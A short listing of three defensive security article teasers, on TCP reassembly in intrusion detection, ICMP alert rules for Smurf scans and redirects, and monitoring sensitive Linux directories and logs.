-
Optimizing TCP Reassembly in Intrusion Detection Systems: Reducing Storage Overhead and Enhancing Performance
TCP reassembly in intrusion detection is crucial yet storage-intensive. Optimizing methods include software tweaks and hardware offloading like FPGA.
-
Understanding ICMP Alerts: GPL SCAN Broadscan Smurf & ICMP Info Redirect
ICMP alert rules identify attempts like Smurf Scanner (sid:2100478) and TOS Redirect (sid:2100436), classifying them as recon and misc activities.
-
Securing Sensitive Directories: Best Practices for Monitoring and Hardening on Linux Systems
Examine sensitive directories like /tmp and hidden folders. Check last access times and command history for security. Logs in /var/log aid in issue resolution.
